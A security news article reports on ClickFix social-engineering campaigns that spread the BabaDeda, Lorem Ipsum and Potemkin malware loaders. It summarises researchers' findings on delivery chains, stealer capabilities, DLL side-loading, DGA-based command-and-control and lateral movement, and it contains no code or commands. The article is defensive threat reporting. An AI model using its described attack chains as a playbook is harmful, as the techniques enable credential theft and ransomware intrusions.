Security experts have identified several ClickFix attack campaigns distributing three distinct malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, according to separate findings from Morphisec, BlueVoyant, and Huntress.
BabaDeda Loader attacks, first spotted in April 2026, have primarily targeted organizations in the education and financial sectors.
“Previous BabaDeda operations were recognized for hiding harmful payloads within seemingly legitimate installer packages,” explained Morphisec researcher Shmuel Uzan. “This updated framework retains the same underlying code but evolves it into a much more powerful loader engineered for stealth, evasion, and versatile payload delivery.”
These attacks begin with a ClickFix social engineering trick that manipulates users into executing attacker-provided PowerShell commands. This initial step delivers the loader, which subsequently deploys information stealers and remote access trojans (RATs) using a blend of common techniques such as hidden PowerShell, in-memory shellcode execution, DLL side-loading, and external payload storage.
This malicious activity has been linked to BabaDeda, a crypter service initially identified by Morphisec in November 2021. At that time, it was associated with a campaign targeting the cryptocurrency and Web3 industries to spread information stealers, RATs, and LockBit ransomware.
The loader is built to analyze the host system, avoid execution on Russian or Belarusian machines, and conduct checks for security software before fetching the primary payload and injecting it into a trusted Windows process like “svchost.exe.”
One type of malware distributed through BabaDeda Loader is a .NET backdoor and information stealer capable of gathering sensitive data and creating an encrypted connection to a command-and-control (C2) server. This malware offers a broad set of capabilities, including –
- Gathering comprehensive system details
- Identifying installed browser profiles
- Retrieving browser data such as cookies, browsing history, saved login credentials, user preferences, and local-state encryption keys
- Navigating directories and picking files according to predefined rules
- Reading and stealing file contents
- Taking screenshots and showing information
- Running shell commands or external programs and collecting their output
- Sending stolen data back to the C2 server
- Utilizing native Windows APIs for process interaction, memory management, DPAPI access, Restart Manager functions, and advanced file operations
A second attack sequence involves dropping a ZIP file that uses DLL side-loading to activate DanaBot and SectopRAT (also known as ArechClient). A key feature of these attacks is the use of a multi-stage loader component called Storage Crypter, which retrieves payload data from external storage-like files such as “List.Control.dat.”
“The visible application package looks genuine, while malicious payloads stay concealed within externally stored containers and are only decoded just before execution,” Morphisec noted. “This approach reduces forensic traces, complicates automated analysis, and limits the ability of traditional security solutions to detect malicious activity before it runs.”
These findings highlight the ongoing evolution of modern loader frameworks, which are becoming increasingly modular. They now separate delivery, storage, execution, and payload deployment into distinct components instead of relying on a single, all-in-one program.
ClickFix Chain Delivers Lorem Ipsum Loader
The ClickFix method has also been seen in an ongoing campaign leveraging at least five compromised WordPress sites as entry points to distribute a new loader and backdoor named Lorem Ipsum Loader. The affected websites cover various industries, including architecture, legal services, and construction technology.
This campaign represents a shift from earlier opportunistic attacks that used tampered Microsoft Teams installers distributed through fake download sites promoted via SEO poisoning and malvertising. The loader is believed to have been active since February 2026.
“The move to ClickFix lures hosted on compromised WordPress (WP) sites greatly expands the range of potential victims and shows the attackers’ ability to quickly adjust their initial access methods,” stated BlueVoyant researchers Thomas Elkins and Joshua Green.
This shift in delivery tactics is attributed to Microsoft’s recent takedown of Fox Tempest (also known as Forging Marauder), a threat actor that offered a malware-signing-as-a-service (MSaaS). This service allowed attackers to distribute malware without triggering alerts by using fraudulently obtained Microsoft Trusting Signing certificates.
“Losing access to these certificates made the previous signed-installer delivery model unusable, compelling the operators to switch to a method that completely bypasses the need for code signing,” the researchers added.
This threat cluster is a recent example of how cybercriminals can swiftly recover and switch to alternative delivery methods, even as security teams and law enforcement work to dismantle their operations.
The Lorem Ipsum ecosystem has been confidently linked to a financially driven threat group called Vanilla Tempest (also known as Rapid Brigantine, Vice Society, and Vice Spider). This group is notorious for deploying ransomware families such as Rhysida, BlackCat, Zeppelin, and Quantum Locker.
Attack sequences involving Lorem Ipsum Loader use ClickFix-style lures disguised as Edge browser security updates. Victims are tricked into running a malicious command that downloads a ZIP file along with an outdated 2017 version of Node.js (version 7.10.1). This older Node.js version is used to run JavaScript-based payloads contained in the archive, helping the malware evade detection.
The JavaScript payload acts as a dropper, installing and running additional malware on the infected system. This includes a batch script that establishes persistence by initiating a DLL side-loading chain. This chain executes a malicious DLL (“mscoree.dll” or “msvcp140.dll”), which then decodes the embedded Lorem Ipsum Loader payload.
“The Lorem Ipsum Loader is built to fetch the next-stage Lorem Ipsum Backdoor from C2 infrastructure details stored on attacker-controlled profiles hosted on social media platforms,” BlueVoyant explained. They added that the backdoor includes features to execute further payloads received from the C2 server.
“The Lorem Ipsum chain ultimately hands off to Rapid Brigantine’s well-known post-exploitation tools and finally to their documented ransomware.”
Potemkin, RMMProject, and EtherRAT Deployed via ClickFix
A third ClickFix-driven campaign leverages a multi-stage attack sequence: it first installs an MSI package, which then delivers an HTML Application (HTA) payload that drops a previously unknown loader named Potemkin. This loader acts as a gateway to deploy EtherRAT and RMMProject—a Lua-scriptable DLL equipped with modules for remote screen hijacking and stealing browser credentials by bypassing Chromium’s App-Bound Encryption (ABE) defenses.
RMMProject also features a task scheduler capable of launching files or processes, capturing screenshots, harvesting browser autofill data, executing arbitrary Lua scripts, killing browser processes, and downloading and running additional modules from a remote URL on the fly.
The Potemkin loader is described as a “purpose-built x64 loader that relies on a domain generation algorithm to locate its command-and-control server and reflectively loads subsequent modules directly into memory,” according to Huntress researchers Anna Pham and Zach Rogers. The security firm flagged this activity last month.
The loader contains several dedicated components that collectively manage its operational lifecycle, including DGA-based C2 discovery powered by a built-in dictionary of 1,000 words, victim identification through a unique UUID value stored at “%LOCALAPPDATA%hyper-v.ver,” task polling, DLL fetching and execution, and a custom byte-level cipher to encrypt both C2 traffic and the DGA dictionary.
Once foothold access is secured, the unidentified threat actor is observed performing interactive operator-driven actions—configuring Microsoft Defender exclusions, spinning up Chisel reverse SOCKS tunnelling, carrying out further reconnaissance, establishing a Cloudflare tunnel for persistence, and moving laterally through the environment via WMIExec and SMBExec to reach the domain controller and spread EtherRAT to more than 11 hosts.
ClickFix Persists as a Potent Attack Vector
These findings arrive amid ClickFix’s ongoing evolution as a highly effective technique for targeting both Windows and macOS users through deceptive bot-check screens that serve up malicious payloads such as Phexia Stealer—a macOS-focused information stealer—and HellsUlcker, a backdoor delivered through EtherHiding that can pull files from a C2 server, execute them, and report outcomes back to the attacker.
Seizing on surging public curiosity around artificial intelligence (AI) tools, ClickFix campaigns have also circulated counterfeit MSI installers disguised as packages for Claude to silently trigger PowerShell-based payloads.
“ClickFix works because it preys on basic human instinct,” Huntress researchers noted. “When presented with a confident, authoritative-step instruction—’press Win+R, paste this text, hit Enter’—users tend to comply without hesitation. The social engineering behind it doesn’t need to be elaborate; it simply resembles a routine system fix, and that alone is frequently sufficient.”
The inherent danger of blindly pasting website-sourced commands into Terminal (whether prompted by a web page, chatbot, email, or messaging platform) has motivated Apple to roll out a new safety prompt in macOS Tahoe 26.4. This pop-up intercepts Mac users mid-action when they attempt to run unverified commands from external sources.
“Scammers exploit these platforms by telling users to paste harmful commands into Terminal at, compromising your Mac or stealing your private information,” Apple explained in a newly released support article. “This alert is designed to help ensure you don’t accidentally run something you never intended to.”
